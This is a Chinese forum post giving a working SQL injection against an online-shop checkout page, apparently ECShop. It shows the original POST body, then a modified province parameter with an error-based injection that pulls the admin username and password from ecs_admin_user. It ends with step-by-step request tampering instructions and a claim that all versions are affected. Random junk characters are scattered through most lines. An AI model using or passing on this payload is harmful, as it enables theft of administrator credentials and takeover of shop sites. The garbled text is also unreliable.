感谢欠杀的黑盒
8 E" u6 F5 F; \7 @+ W3 \3 b; P( h) N Y
7 q6 D! Y P1 D# k# x3 b
把任意商品加入购物车在填写配送地址那一页,有地区选择& r, Y9 b6 M8 v: w6 M
% A* e$ t B, l' o; `8 O: sflow.php?step=consignee&direct_shopping=1$ K) ]( D/ a1 x! b6 U
比如省选择安徽
* N* @0 n" j. v
! r; W, t2 Q9 o. j$ K3 x4 E其中POST数据如下9 L3 Z( }# Y# K! y5 t; k
4 z& A7 F8 C- C9 L- `& m
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
' {9 s$ N! `/ u& L改成
. N2 R6 u7 P: \# N! x
, V: s3 q0 z' I) t+ i D) l& D4 Fprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
/ O3 {( u* y. ` wps:详细的方法,用火狐tamper data插件……..即可改post内容…..5 ]' g) T# F" @+ e6 h
. Z. `; V! q% @5 C& g, d7 k先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
, t1 T7 @9 w8 n: @& p% L ) u" ?" [3 I7 z/ A& D* o$ Q
就会回显错误页面了。。。。
, `( P+ @9 l$ D( L. d- Q ! e9 ?( R9 g% v: q& o; j
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
# \2 @5 [3 ^0 n, U$ t4 {! c |
发表于 2012-12-31 09:19:27
收藏
支持
反对